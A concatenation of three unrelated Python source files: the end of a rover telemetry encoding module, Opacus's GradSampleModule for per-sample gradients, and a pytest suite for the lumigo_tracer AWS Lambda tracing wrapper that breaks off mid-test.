                flags |= flag
        return flags

    def description(self):
        return "bit flags"
class DriveMode(enum.IntEnum):
    """Motor drive control mode: 0=open loop, 1=closed loop."""
    OPEN_LOOP = 0
    CLOSED_LOOP = 1
# Shared big-endian integer codecs used by the composite formats below.
UINT16 = IntDataFormat(2, False)
INT16 = IntDataFormat(2, True)
UINT8 = IntDataFormat(1, signed=False)
class DataFormatFixedPrecision(ReadDataFormat, WriteDataFormat):
    """A fractional number packed as an integer, but representing a fractional number"""

    def __init__(self, base_type, step=1.0, zero=0.0):
        self.base_type = base_type
        # a change of 1 in the python type corresponds to a change of this many in the base type
        self.step = step
        # the value of 0 in the python type corresponds to this value in the base type
        self.zero = zero

    def unpack(self, b: bytes):
        raw = self.base_type.unpack(b)
        return (raw - self.zero) / self.step

    def pack(self, p):
        raw = round(p * self.step + self.zero)
        return self.base_type.pack(raw)

    def description(self):
        return "fractional (resolution=1/{}, zero={}) stored as {}".format(
            self.step, self.zero, self.base_type.description())
class DataFormatDriveMode(ReadDataFormat):
    """Codec for the DriveMode enum, carried as an unsigned 16-bit word."""

    python_type = DriveMode

    def unpack(self, b: bytes):
        raw = UINT16.unpack(b)
        return DriveMode(raw)

    def pack(self, p: DriveMode):
        return UINT16.pack(p.value)

    def description(self):
        # Reuses the enum's docstring as the wire description.
        return DriveMode.__doc__
# Pre-built codecs for specific telemetry fields.  The second argument is the
# fixed-point scale (wire units per python unit); `zero` is the wire offset.
OLD_CURRENT_FORMAT = DataFormatFixedPrecision(UINT16, 34)       # 1/34 resolution
SIGNED_MILLIS_FORMAT = DataFormatFixedPrecision(INT16, 1000)    # signed milli-units
UNSIGNED_MILLIS_FORMAT = DataFormatFixedPrecision(UINT16, 1000) # unsigned milli-units
OLD_VOLTAGE_FORMAT = DataFormatFixedPrecision(UINT16, 58)       # 1/58 resolution
FAN_SPEED_RESPONSE_FORMAT = DataFormatFixedPrecision(UINT16, 240)
DECIKELVIN_FORMAT = DataFormatFixedPrecision(UINT16, 10, zero=2731.5)  # 0 => 273.15 dK offset (Celsius)
PERCENTAGE_FORMAT = DataFormatFixedPrecision(UINT16, 100)
MOTOR_EFFORT_FORMAT = DataFormatFixedPrecision(UINT8, 125, 125)  # byte 125 => effort 0
CHARGER_STATE_FORMAT = DataFormatChargerState()
FIRMWARE_VERSION_FORMAT = DataFormatFirmwareVersion()
DRIVE_MODE_FORMAT = DataFormatDriveMode()
BATTERY_STATUS_FORMAT = DataFormatBatteryStatus()
class MotorStatusFlag(enum.Flag):
    """Motor status flags; wire bit positions are assigned in declaration
    order by DataFormatMotorStatus (FAULT1 = bit 0 ... COAST = bit 5)."""
    NONE = 0
    FAULT1 = enum.auto()
    FAULT2 = enum.auto()
    DECAY_MODE = enum.auto()
    REVERSE = enum.auto()
    BRAKE = enum.auto()
    COAST = enum.auto()
class DataFormatMotorStatus(ReadDataFormat):
    """Decodes the 16-bit motor status word into MotorStatusFlag flags."""

    def description(self):
        return "motor status bit flags"

    def unpack(self, b: bytes):
        """Decode two bytes into MotorStatusFlag flags (bit i -> i-th flag).

        Raises ValueError if bits beyond the known flags are set.
        """
        u = UINT16.unpack(b)
        bit_meanings = [
            MotorStatusFlag.FAULT1,
            MotorStatusFlag.FAULT2,
            MotorStatusFlag.DECAY_MODE,
            MotorStatusFlag.REVERSE,
            MotorStatusFlag.BRAKE,
            MotorStatusFlag.COAST,
        ]
        # A word using all known bits has bit_length == len(bit_meanings);
        # the original `<=` rejected valid words whose top known bit was set
        # (e.g. COAST alone: bit_length 6 vs 6 flags).
        if u.bit_length() > len(bit_meanings):
            raise ValueError("too many bits to unpack")
        result = MotorStatusFlag.NONE
        for i, flag in enumerate(bit_meanings):
            if u & (1 << i):
                result |= flag
        return result
class DataFormatIgnored(WriteDataFormat):
    """Write-only placeholder: emits n_bytes of zeros and accepts no value."""

    def __init__(self, n_bytes):
        self.n_bytes = n_bytes

    def description(self):
        return f"Ignored data {self.n_bytes} bytes long"

    def pack(self, value=None) -> bytes:
        assert value is None
        # bytes(n) is n zero bytes.
        return bytes(self.n_bytes)
class SystemFaultFlag(enum.Flag):
    """System fault flags; wire bit positions are assigned in declaration
    order by DataFormatSystemFault (OVERSPEED = bit 0, OVERCURRENT = bit 1)."""
    NONE = 0
    OVERSPEED = enum.auto()
    OVERCURRENT = enum.auto()
class DataFormatSystemFault(ReadDataFormat):
    """Decodes the 16-bit system fault word into SystemFaultFlag flags."""

    def description(self):
        return "System fault bit flags"

    def unpack(self, b: bytes):
        """Decode two bytes into SystemFaultFlag flags (bit i -> i-th flag).

        Raises ValueError if bits beyond the known flags are set.
        """
        u = UINT16.unpack(b)
        bit_meanings = [SystemFaultFlag.OVERSPEED, SystemFaultFlag.OVERCURRENT]
        # The original `<=` comparison rejected valid words with the top
        # known bit set (e.g. OVERCURRENT alone: bit_length 2 vs 2 flags).
        if u.bit_length() > len(bit_meanings):
            raise ValueError("too many bits to unpack")
        result = SystemFaultFlag.NONE
        for i, flag in enumerate(bit_meanings):
            if u & (1 << i):
                result |= flag
        return result
class DataElement:
    """One addressable telemetry element in the rover data map.

    index: wire index of the element.
    data_format: codec used to decode/encode its value.
    name / description: human-readable labels.
    not_implemented: element is never supported by any firmware.
    since / until: firmware version strings bounding availability
        (inclusive since, exclusive until).
    """

    def __init__(
        self,
        index: int,
        data_format: ReadDataFormat,
        name: str,
        description: str = None,
        not_implemented: bool = False,
        since: Optional[str] = None,
        until: Optional[str] = None,
    ):
        self.index = index
        self.data_format = data_format
        self.name = name
        self.description = description
        self.not_implemented = not_implemented
        self.since_version = None if since is None else RoverFirmwareVersion.parse(since)
        self.until_version = None if until is None else RoverFirmwareVersion.parse(until)

    def supported(self, version):
        """Return True if this element is available in the given firmware
        version (a version string or a RoverFirmwareVersion)."""
        if isinstance(version, str):
            v = RoverFirmwareVersion.parse(version)
        elif isinstance(version, RoverFirmwareVersion):
            v = version
        else:
            # The original formatted type(RoverFirmwareVersion) -- i.e. the
            # metaclass -- into the message instead of the class itself.
            raise TypeError(
                f"Expected str or RoverFirmwareVersion, but got {type(version)}"
            )
        if self.not_implemented:
            return False
        if self.since_version is not None and v < self.since_version:
            return False
        if self.until_version is not None and self.until_version <= v:
            return False
        return True
# Telemetry element table: one entry per even byte offset in the rover status
# payload, giving its wire format, name, and human-readable description.
# `since`/`until` bound the firmware versions that implement each element.
elements = [
    DataElement(
        0, OLD_CURRENT_FORMAT, "battery (A+B) current (external)", "total current from batteries"
    ),
    DataElement(2, UINT16, "left motor speed", not_implemented=True),
    DataElement(4, UINT16, "right motor speed", not_implemented=True),
    DataElement(
        6,
        UINT16,
        "flipper position 1",
        "flipper position sensor 1. 0=15 degrees; 1024=330 degrees;",
    ),
    DataElement(
        8,
        UINT16,
        "flipper position 2",
        "flipper position sensor 2. 0=15 degrees; 1024=330 degrees;",
    ),
    DataElement(10, OLD_CURRENT_FORMAT, "left motor current"),
    DataElement(12, OLD_CURRENT_FORMAT, "right motor current"),
    DataElement(
        14,
        UINT16,
        "left motor encoder count",
        "May overflow or underflow. Increments when motor driven forward, decrements backward",
        since="1.4",
    ),
    DataElement(
        16,
        UINT16,
        "right motor encoder count",
        "May overflow or underflow. Increments when motor driven forward, decrements backward",
        since="1.4",
    ),
    DataElement(18, UINT16, "motors fault flag", not_implemented=True),
    DataElement(20, UINT16, "left motor temperature"),
    DataElement(22, UINT16, "right motor temperature", not_implemented=True),
    DataElement(24, OLD_VOLTAGE_FORMAT, "battery A voltage (external)"),
    DataElement(26, OLD_VOLTAGE_FORMAT, "battery B voltage (external)"),
    DataElement(
        28,
        UINT16,
        "left motor encoder interval",
        "0 when motor stopped. Else proportional to motor period (inverse motor speed)",
    ),
    DataElement(
        30,
        UINT16,
        "right motor encoder interval",
        "0 when motor stopped. Else proportional to motor period (inverse motor speed)",
    ),
    DataElement(
        32,
        UINT16,
        "flipper motor encoder interval",
        "0 when motor stopped. Else proportional to motor period (inverse motor speed)",
        not_implemented=True,
    ),
    DataElement(
        34,
        PERCENTAGE_FORMAT,
        "battery A state of charge",
        "Proportional charge, 0.0=empty, 1.0=full",
    ),
    DataElement(
        36,
        PERCENTAGE_FORMAT,
        "battery B state of charge",
        "Proportional charge, 0.0=empty, 1.0=full",
    ),
    DataElement(38, CHARGER_STATE_FORMAT, "battery charging state"),
    DataElement(40, FIRMWARE_VERSION_FORMAT, "release version"),
    DataElement(42, OLD_CURRENT_FORMAT, "battery A current (external)"),
    DataElement(44, OLD_CURRENT_FORMAT, "battery B current (external)"),
    DataElement(46, UINT16, "motor flipper angle"),
    DataElement(48, FAN_SPEED_RESPONSE_FORMAT, "fan speed"),
    DataElement(50, DRIVE_MODE_FORMAT, "drive mode", until="1.7"),
    DataElement(52, BATTERY_STATUS_FORMAT, "battery A status", since="1.2"),
    DataElement(54, BATTERY_STATUS_FORMAT, "battery B status", since="1.2"),
    DataElement(56, UINT16, "battery A mode", since="1.2"),
    DataElement(58, UINT16, "battery B mode", since="1.2"),
    DataElement(60, DECIKELVIN_FORMAT, "battery A temperature (internal)", since="1.2"),
    DataElement(62, DECIKELVIN_FORMAT, "battery B temperature (internal)", since="1.2"),
    DataElement(64, UNSIGNED_MILLIS_FORMAT, "battery A voltage (internal)", since="1.2"),
    DataElement(66, UNSIGNED_MILLIS_FORMAT, "battery B voltage (internal)", since="1.2"),
    DataElement(
        68,
        SIGNED_MILLIS_FORMAT,
        "battery A current (internal)",
        ">0 = charging; <0 = discharging",
        since="1.2",
    ),
    DataElement(
        70,
        SIGNED_MILLIS_FORMAT,
        "battery B current (internal)",
        ">0 = charging; <0 = discharging",
        since="1.2",
    ),
    DataElement(72, DataFormatMotorStatus(), "left motor status", since="1.7"),
    DataElement(74, DataFormatMotorStatus(), "right motor status", since="1.7"),
    DataElement(76, DataFormatMotorStatus(), "flipper motor status", since="1.7"),
    DataElement(78, FAN_SPEED_RESPONSE_FORMAT, "fan 1 duty", since="1.9"),
    DataElement(80, FAN_SPEED_RESPONSE_FORMAT, "fan 2 duty", since="1.9"),
    DataElement(82, DataFormatSystemFault(), "system fault flags", since="1.10"),
]
# Index the table by element offset for O(1) lookup.
ROVER_DATA_ELEMENTS = {e.index: e for e in elements}
def strike(s):
    """Wrap *s* in Markdown strikethrough markers (non-str values are coerced)."""
    return "~~{}~~".format(s)
def doc():
    """Render the telemetry element table as a Markdown table.

    Returns:
        A Markdown string with a header plus one row per element; rows for
        not-implemented elements have their index struck through.
    """
    lines = ["| # | Name | Data Type | Description |", "| - | ---- | --------- | ----------- |"]
    for de in elements:
        # Bug fix: str.join requires strings, but de.index is an int (the
        # non-strike branch passed it through unconverted) and de.description
        # may be None; coerce both before joining.
        index_cell = strike(de.index) if de.not_implemented else str(de.index)
        lines.append(
            "|"
            + "|".join(
                [
                    index_cell,
                    de.name,
                    de.data_format.description(),
                    de.description or "",
                ]
            )
            + "|"
        )
    return "\n".join(lines)
# Script entry point: print the Markdown documentation table for the elements.
if __name__ == "__main__":
    print(doc())
def fix_encoder_delta(delta):
    """Fold a raw encoder difference into the signed 16-bit range.

    Encoder counts wrap modulo 2**16, so a small backward movement appears
    as a huge positive delta; map it back to the nearest signed value in
    [-32768, 32767].
    """
    MAX_ENCODER = 2 ** 16
    wrapped = delta % MAX_ENCODER
    return wrapped if wrapped < MAX_ENCODER / 2 else wrapped - MAX_ENCODER
|
<reponame>anibadde/opacus
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from functools import partial
from typing import Iterable, List, Tuple
import torch
import torch.nn as nn
from opacus.layers.dp_rnn import DPRNNBase, DPRNNCellBase, RNNLinear
from opacus.utils.module_inspection import requires_grad
class UnsupportedModuleError(ValueError):
    """Raised when a module has no registered per-sample gradient support."""
class GradSampleModule(nn.Module):
    r"""
    Extends nn.Module so that its parameter tensors have an extra field called .grad_sample.
    """
    # Maps module type -> grad-sampler function; populated elsewhere (registration
    # happens outside this class, on the class attribute).
    GRAD_SAMPLERS = {}
    def __init__(self, m: nn.Module, *, batch_first=True, loss_reduction="mean"):
        # Wrap ``m`` and immediately register forward/backward hooks on every
        # trainable submodule that has an entry in GRAD_SAMPLERS.
        super().__init__()
        self._module = m
        self.hooks_enabled = False
        self.batch_first = batch_first
        self.loss_reduction = loss_reduction
        self.add_hooks(loss_reduction=loss_reduction, batch_first=batch_first)
    def forward(self, x):
        # Transparent pass-through to the wrapped module.
        return self._module(x)
    def zero_grad(self):
        # Also drop accumulated per-sample gradients (see del_grad_sample for why
        # they are deleted rather than zeroed in place).
        self.del_grad_sample()
        super().zero_grad()
    def del_grad_sample(self):
        """
        Deletes ``.grad_sample`` from this module's parameters.
        Why del? Normally, ``zero_grad()`` would do ``p.grad.zero_()`` and keep the allocation.
        Normal grads can do this, because their shape is always the same.
        Grad samples do not behave like this, because they accumulate over the batch dim.
        If you have ``batch_size=32`` and size (12, 16) and you backprop twice, you should
        expect to have grad_samples of size [64, 12, 16]. If you backprop once more,
        then you'll get size [96, 12, 16] and so on.
        So when you zero out, you should be left with nothing so you can start over.
        """
        for p in self.parameters():
            if hasattr(p, "grad_sample") and p.grad_sample is not None:
                # Detach from the graph (or drop requires_grad) before deletion so
                # no autograd history keeps the tensor alive.
                if p.grad_sample.grad_fn is not None:
                    p.grad_sample.detach_()
                else:
                    p.grad_sample.requires_grad_(False)
                del p.grad_sample
    def to_standard_module(self) -> nn.Module:
        """
        Returns the standard nn.Module wrapped by this, eliminating all traces
        of grad samples and hooks
        Returns:
            The wrapped module
        """
        self._close()
        return self._module
    def add_hooks(self, loss_reduction: str = "mean", batch_first: bool = True) -> None:
        """
        Adds hooks to model to save activations and backprop values.
        The hooks will
        1. save activations into param.activations during forward pass
        2. compute per-sample gradients in params.grad_sample during backward pass.
        Call ``remove_hooks(model)`` to disable this.
        Args:
            model: the model to which hooks are added
            loss_type: either "mean" or "sum" depending on whether backpropped
            loss was averaged or summed over batch (default: "mean")
            batch_dim: the batch dimension (default: 0)
        """
        if hasattr(self._module, "autograd_grad_sample_hooks"):
            raise ValueError("Trying to add hooks twice to the same model")
        else:
            # The handle list lives on the wrapped module (so double-wrapping is
            # detectable) and is aliased on the wrapper for convenience.
            self._module.autograd_grad_sample_hooks = []
            self.autograd_grad_sample_hooks = self._module.autograd_grad_sample_hooks
        for module in self.trainable_modules():
            if type(module) in self.GRAD_SAMPLERS:
                self.autograd_grad_sample_hooks.append(
                    module.register_forward_hook(self.capture_activations_hook)
                )
                # NOTE(review): register_backward_hook is deprecated in newer
                # torch releases in favor of register_full_backward_hook —
                # presumably fine for the torch version this targets; confirm.
                self.autograd_grad_sample_hooks.append(
                    module.register_backward_hook(
                        partial(
                            self.capture_backprops_hook,
                            loss_reduction=loss_reduction,
                            batch_first=batch_first,
                        )
                    )
                )
        self.enable_hooks()
    def remove_hooks(self) -> None:
        """
        Removes hooks added by ``add_hooks()``
        """
        self.disable_hooks()
        # ddp_hooks are only present when set up elsewhere; remove them first if so.
        if hasattr(self, "ddp_hooks"):
            while self.ddp_hooks:
                handle = self.ddp_hooks.pop()
                handle.remove()
            delattr(self, "ddp_hooks")
        if not hasattr(self, "autograd_grad_sample_hooks"):
            raise ValueError("Asked to remove hooks, but no hooks found")
        else:
            while self.autograd_grad_sample_hooks:
                handle = self.autograd_grad_sample_hooks.pop()
                handle.remove()
            # Drop both the wrapper alias and the wrapped module's attribute so
            # add_hooks() can be called again later.
            delattr(self, "autograd_grad_sample_hooks")
            delattr(self._module, "autograd_grad_sample_hooks")
    def disable_hooks(self) -> None:
        r"""
        Globally disable all hooks installed by this library.
        Why is this needed? As per https://github.com/pytorch/pytorch/issues/25723, there is
        a bug in Autograd that makes removing hooks do nothing if the graph was already
        constructed. For this reason, we have this method to at least turn them off.
        """
        self.hooks_enabled = False
    def enable_hooks(self) -> None:
        r"""
        The opposite of ``disable_hooks()``. Hooks are always enabled unless you explicitly
        disable them so you don't need to call this unless you want to re-enable them.
        """
        self.hooks_enabled = True
    def parametrized_modules(self) -> Iterable[nn.Module]:
        """
        Recursively iterates over all submodules, returning those that
        have parameters (as opposed to "wrapper modules" that just organize modules).
        """
        yield from (
            m
            for m in self._module.modules()
            if any(p is not None for p in m.parameters(recurse=False))
        )
    def trainable_modules(self) -> Iterable[nn.Module]:
        """
        Recursively iterates over all submodules, returning those that
        have parameters and are trainable (ie they want a grad).
        """
        yield from (
            m
            for m in self.parametrized_modules()
            if any(p.requires_grad for p in m.parameters())
        )
    def __repr__(self):
        return f"GradSample({self._module.__repr__()})"
    def _close(self):
        # Tear-down helper used by to_standard_module(): clear per-sample grads
        # then unregister all hooks.
        self.del_grad_sample()
        self.remove_hooks()
    def capture_activations_hook(
        self,
        module: nn.Module,
        forward_input: List[torch.Tensor],
        _forward_output: torch.Tensor,
    ):
        # Forward hook: stash the (detached) input activation for use in the
        # backward pass. Skipped when the module is frozen, in eval mode, grad is
        # globally disabled, or hooks are switched off.
        if (
            not requires_grad(module)
            or not module.training
            or not torch.is_grad_enabled()
        ):
            return
        if not self.hooks_enabled:
            return
        if not hasattr(module, "activations"):
            module.activations = []
        module.activations.append(forward_input[0].detach())  # pyre-ignore
    def capture_backprops_hook(
        self,
        module: nn.Module,
        _forward_input: torch.Tensor,
        forward_output: torch.Tensor,
        loss_reduction: str,
        batch_first: bool,
    ):
        """Captures backprops in backward pass and store per-sample gradients."""
        # Registered via register_backward_hook, so despite the parameter names
        # ``_forward_input``/``forward_output`` here are grad_input/grad_output.
        if not self.hooks_enabled:
            return
        backprops = forward_output[0].detach()
        activations, backprops = self.rearrange_grad_samples(
            module, backprops, loss_reduction, batch_first
        )
        grad_sampler_fn = self.GRAD_SAMPLERS[type(module)]
        grad_sampler_fn(module, activations, backprops)
        # Once every stored activation has been consumed, clear the cached
        # max_batch_len so the next forward pass recomputes it.
        if (
            not isinstance(module.activations, list) or len(module.activations) == 0
        ) and hasattr(module, "max_batch_len"):
            del module.max_batch_len
    def rearrange_grad_samples(
        self,
        module: nn.Module,
        backprops: torch.Tensor,
        loss_reduction: str,
        batch_first: bool,
    ) -> Tuple[torch.Tensor, torch.Tensor]:
        """
        Rearrange activations and grad_samples based on loss reduction and batch dim
        Args:
            module: the module for which per-sample gradients are computed
            backprops: the captured backprops
            loss_reduction: either "mean" or "sum" depending on whether backpropped
            loss was averaged or summed over batch
            batch_first: True is batch dimension is first
        """
        if not hasattr(module, "activations"):
            raise ValueError(
                f"No activations detected for {type(module)},"
                " run forward after add_hooks(model)"
            )
        batch_dim = 0 if batch_first or type(module) is RNNLinear else 1
        if isinstance(module.activations, list):
            # LIFO: the most recent forward activation matches this backward call.
            A = module.activations.pop()
        else:
            A = module.activations
        if not hasattr(module, "max_batch_len"):
            # For packed sequences, max_batch_len is set in the forward of the model (e.g. the LSTM)
            # Otherwise we infer it here
            module.max_batch_len = _get_batch_size(module, A, batch_dim)
        n = module.max_batch_len
        if loss_reduction == "mean":
            # Undo the 1/n averaging so per-sample gradients are unscaled.
            B = backprops * n
        elif loss_reduction == "sum":
            B = backprops
        else:
            raise ValueError(
                f"loss_reduction = {loss_reduction}. Only 'sum' and 'mean' losses are supported"
            )
        # No matter where the batch dimension was, .grad_samples will *always* put it in the first dim
        if batch_dim != 0:
            A = A.permute([batch_dim] + [x for x in range(A.dim()) if x != batch_dim])
            B = B.permute([batch_dim] + [x for x in range(B.dim()) if x != batch_dim])
        return A, B
    @classmethod
    def is_supported(cls, module: nn.Module) -> bool:
        """Check if this module is supported"""
        return type(module) in cls.GRAD_SAMPLERS or isinstance(
            module, (DPRNNBase, DPRNNCellBase)
        )
def _get_batch_size(
    module: nn.Module, grad_sample: torch.Tensor, batch_dim: int
) -> int:
    r"""
    Return the largest size along ``batch_dim`` across ``module.activations``
    (when it is a list) and ``grad_sample``. If ``module.activations`` is not
    a list, this is simply ``grad_sample.shape[batch_dim]``.
    """
    sizes = [grad_sample.shape[batch_dim]]
    if isinstance(module.activations, list):
        sizes.extend(a.shape[batch_dim] for a in module.activations)
    return max(sizes)
|
<gh_stars>0
import datetime
import json
import time
import os
import sys
import urllib
from functools import wraps
from io import BytesIO
from types import SimpleNamespace
import logging
from typing import Dict
import urllib3
from capturer import CaptureOutput
from lumigo_tracer import lumigo_tracer, LumigoChalice, utils, add_execution_tag
from lumigo_tracer.auto_tag import auto_tag_event
from lumigo_tracer.parsers.parser import Parser
import http.client
from lumigo_tracer.utils import (
Configuration,
STEP_FUNCTION_UID_KEY,
LUMIGO_EVENT_KEY,
_create_request_body,
EXECUTION_TAGS_KEY,
)
import pytest
from lumigo_tracer.spans_container import SpansContainer
def test_lambda_wrapper_basic_events(reporter_mock):
    """
    This test checks that the basic events (start and end messages) have been sent.
    """
    @lumigo_tracer(token="<PASSWORD>")
    def lambda_test_function():
        pass
    lambda_test_function()
    function_span = SpansContainer.get_span().function_span
    assert not SpansContainer.get_span().http_spans
    assert "started" in function_span
    assert "ended" in function_span
    # Exactly two reports are expected: one at invocation start, one at the end.
    assert reporter_mock.call_count == 2
    first_send = reporter_mock.call_args_list[0][1]["msgs"]
    assert len(first_send) == 1
    assert first_send[0]["id"].endswith("_started")
    assert first_send[0]["maxFinishTime"]
@pytest.mark.parametrize("exc", [ValueError("Oh no"), ValueError(), ValueError(Exception())])
def test_lambda_wrapper_exception(exc):
    # Verifies that a raised exception is recorded on the function span with a
    # single, tracer-free stack frame and its local variables.
    @lumigo_tracer(token="<PASSWORD>")
    def lambda_test_function():
        a = "A"  # noqa
        raise exc
    try:
        lambda_test_function()
    except ValueError:
        pass
    else:
        assert False
    function_span = SpansContainer.get_span().function_span
    assert not SpansContainer.get_span().http_spans
    assert function_span.get("error", {}).get("type") == "ValueError"
    # Make sure no lumigo_tracer
    assert len(function_span["error"]["frames"]) == 1
    assert function_span["error"]["frames"][0].pop("lineno") > 0
    assert function_span["error"]["frames"][0] == {
        "function": "lambda_test_function",
        "fileName": __file__,
        "variables": {"a": "A", "exc": str(exc)},
    }
    assert not function_span["id"].endswith("_started")
    assert "reporter_rtt" in function_span
    assert "maxFinishTime" not in function_span
    # Test that we can create an output message out of this span
    assert _create_request_body([function_span], prune_size_flag=False)
def test_lambda_wrapper_http():
    # An outgoing HTTP request should produce an http span with host, timing,
    # and captured request headers.
    @lumigo_tracer(token="<PASSWORD>")
    def lambda_test_function():
        time.sleep(0.01)
        http.client.HTTPConnection("www.google.com").request("POST", "/")
    lambda_test_function()
    http_spans = SpansContainer.get_span().http_spans
    assert http_spans
    assert http_spans[0].get("info", {}).get("httpInfo", {}).get("host") == "www.google.com"
    assert "started" in http_spans[0]
    assert http_spans[0]["started"] > SpansContainer.get_span().function_span["started"]
    assert "ended" in http_spans[0]
    assert "content-length" in http_spans[0]["info"]["httpInfo"]["request"]["headers"]
def test_lambda_wrapper_query_with_http_params():
    # The query string must be preserved in the captured request URI.
    @lumigo_tracer(token="<PASSWORD>")
    def lambda_test_function():
        http.client.HTTPConnection("www.google.com").request("GET", "/?q=123")
    lambda_test_function()
    http_spans = SpansContainer.get_span().http_spans
    assert http_spans
    print(http_spans[0]["info"]["httpInfo"]["request"])
    assert http_spans[0]["info"]["httpInfo"]["request"]["uri"] == "www.google.com/?q=123"
def test_lambda_wrapper_get_response():
    # Reading the response should populate the response status code on the span.
    @lumigo_tracer(token="<PASSWORD>")
    def lambda_test_function():
        conn = http.client.HTTPConnection("www.google.com")
        conn.request("GET", "")
        conn.getresponse()
    lambda_test_function()
    http_spans = SpansContainer.get_span().http_spans
    assert http_spans
    assert http_spans[0]["info"]["httpInfo"]["response"]["statusCode"] == 200
def test_lambda_wrapper_http_splitted_send():
    """
    This is a test for the specific case of requests, where they split the http requests into headers and body.
    We didn't use directly the package requests in order to keep the dependencies small.
    """
    @lumigo_tracer(token="<PASSWORD>")
    def lambda_test_function():
        conn = http.client.HTTPConnection("www.google.com")
        conn.request("POST", "/", b"123")
        conn.send(BytesIO(b"456"))
    lambda_test_function()
    http_spans = SpansContainer.get_span().http_spans
    assert http_spans
    assert http_spans[0]["info"]["httpInfo"]["request"]["body"] == "123456"
    assert "content-length" in http_spans[0]["info"]["httpInfo"]["request"]["headers"]
def test_lambda_wrapper_no_headers():
    # A raw send() with no request() call should still be captured as a span.
    @lumigo_tracer(token="123")
    def lambda_test_function():
        http.client.HTTPConnection("www.google.com").send(BytesIO(b"123"))
    lambda_test_function()
    http_events = SpansContainer.get_span().http_spans
    assert len(http_events) == 1
    assert http_events[0].get("info", {}).get("httpInfo", {}).get("host") == "www.google.com"
    assert "started" in http_events[0]
    assert "ended" in http_events[0]
def test_lambda_wrapper_http_non_splitted_send():
    # Two requests to different hosts should produce two distinct spans.
    @lumigo_tracer(token="<PASSWORD>")
    def lambda_test_function():
        http.client.HTTPConnection("www.google.com").request("POST", "/")
        http.client.HTTPConnection("www.github.com").send(BytesIO(b"123"))
    lambda_test_function()
    http_events = SpansContainer.get_span().http_spans
    assert len(http_events) == 2
def test_kill_switch(monkeypatch):
    # With LUMIGO_SWITCH_OFF set, the tracer must be a no-op pass-through.
    monkeypatch.setattr(os, "environ", {"LUMIGO_SWITCH_OFF": "true"})
    @lumigo_tracer(token="<PASSWORD>")
    def lambda_test_function():
        return 1
    assert lambda_test_function() == 1
    assert not SpansContainer._span
def test_wrapping_exception(monkeypatch):
    # An internal tracer failure must never break the user's function.
    monkeypatch.setattr(SpansContainer, "create_span", lambda x: 1 / 0)
    @lumigo_tracer(token="<PASSWORD>")
    def lambda_test_function():
        return 1
    assert lambda_test_function() == 1
    assert not SpansContainer._span
def test_wrapping_with_parameters():
    # Keyword arguments to the decorator should flow into the global Configuration.
    @lumigo_tracer(should_report="123")
    def lambda_test_function():
        return 1
    assert lambda_test_function() == 1
    assert Configuration.should_report == "123"
def test_bad_domains_scrubber(monkeypatch):
    # Malformed scrubber JSON should disable reporting instead of raising.
    monkeypatch.setenv("LUMIGO_DOMAINS_SCRUBBER", '["bad json')
    @lumigo_tracer(token="123", should_report=True)
    def lambda_test_function():
        pass
    lambda_test_function()
    assert utils.Configuration.should_report is False
def test_domains_scrubber_happy_flow(monkeypatch):
    # A matching scrubber pattern should strip headers and redact the body.
    @lumigo_tracer(token="<PASSWORD>", domains_scrubber=[".*google.*"])
    def lambda_test_function():
        return http.client.HTTPConnection(host="www.google.com").send(b"\r\n")
    lambda_test_function()
    http_events = SpansContainer.get_span().http_spans
    assert len(http_events) == 1
    assert http_events[0].get("info", {}).get("httpInfo", {}).get("host") == "www.google.com"
    assert "headers" not in http_events[0]["info"]["httpInfo"]["request"]
    assert http_events[0]["info"]["httpInfo"]["request"]["body"] == "The data is not available"
def test_domains_scrubber_override_allows_default_domains(monkeypatch):
    # Overriding the scrubber list should stop scrubbing default AWS domains.
    ssm_url = "www.ssm.123.amazonaws.com"
    @lumigo_tracer(token="<PASSWORD>", domains_scrubber=[".*google.*"])
    def lambda_test_function():
        try:
            return http.client.HTTPConnection(host=ssm_url).send(b"\r\n")
        except Exception:
            return
    lambda_test_function()
    http_events = SpansContainer.get_span().http_spans
    assert len(http_events) == 1
    assert http_events[0].get("info", {}).get("httpInfo", {}).get("host") == ssm_url
    assert http_events[0]["info"]["httpInfo"]["request"]["headers"]
def test_wrapping_with_print_override():
    # enhance_print=True should prefix every printed line with the request id.
    @lumigo_tracer(enhance_print=True)
    def lambda_test_function(event, context):
        print("hello\nworld")
        return 1
    with CaptureOutput() as capturer:
        assert lambda_test_function({}, SimpleNamespace(aws_request_id="1234")) == 1
        assert Configuration.enhanced_print is True
        assert "RequestId: 1234 hello" in capturer.get_lines()
        assert "RequestId: 1234 world" in capturer.get_lines()
def test_wrapping_without_print_override():
    # Without enhance_print, printed output must be left untouched.
    @lumigo_tracer()
    def lambda_test_function(event, context):
        print("hello")
        return 1
    with CaptureOutput() as capturer:
        assert lambda_test_function({}, SimpleNamespace(aws_request_id="1234")) == 1
        assert Configuration.enhanced_print is False
        assert any(line == "hello" for line in capturer.get_lines())
def test_wrapping_json_request():
    # urllib-based JSON requests should be captured with their headers.
    @lumigo_tracer()
    def lambda_test_function():
        urllib.request.urlopen(
            urllib.request.Request(
                "http://api.github.com", b"{}", headers={"Content-Type": "application/json"}
            )
        )
        return 1
    assert lambda_test_function() == 1
    http_events = SpansContainer.get_span().http_spans
    assert any(
        '"content-type": "application/json"'
        in event.get("info", {}).get("httpInfo", {}).get("request", {}).get("headers", "")
        for event in http_events
    )
def test_exception_in_parsers(monkeypatch, caplog):
    # A parser failure should be logged, not propagated to the user's function.
    monkeypatch.setattr(Parser, "parse_request", Exception)
    @lumigo_tracer(token="<PASSWORD>")
    def lambda_test_function():
        return http.client.HTTPConnection(host="www.google.com").send(b"\r\n")
    lambda_test_function()
    assert caplog.records[-1].msg == "An exception occurred in lumigo's code add request event"
def test_lumigo_chalice():
    # LumigoChalice should proxy attribute access untouched and only create a
    # span when the wrapped app itself is invoked.
    class App:
        @property
        def a(self):
            return "a"
        def b(self):
            return "b"
        def __call__(self, *args, **kwargs):
            return "c"
    app = App()
    app = LumigoChalice(app)
    # should not use lumigo's wrapper
    assert app.a == "a"
    assert app.b() == "b"
    assert not SpansContainer._span
    # should create a new span (but return the original value)
    assert app() == "c"
    assert SpansContainer._span
def test_lumigo_chalice_create_extra_lambdas(monkeypatch):
    # mimic aws env
    monkeypatch.setitem(os.environ, "LAMBDA_RUNTIME_DIR", "true")
    class Chalice:
        """
        This class is a mimic of chalice.
        """
        touched = False
        @staticmethod
        def on_s3_event(**kwargs):
            Chalice.touched = True  # represents chalice's global analysis (in the deploy process)
            def _create_registration_function(func):
                @wraps(func)
                def user_lambda_handler(*args, **kwargs):
                    return func(*args, **kwargs)
                return user_lambda_handler
            return _create_registration_function
    app = Chalice()
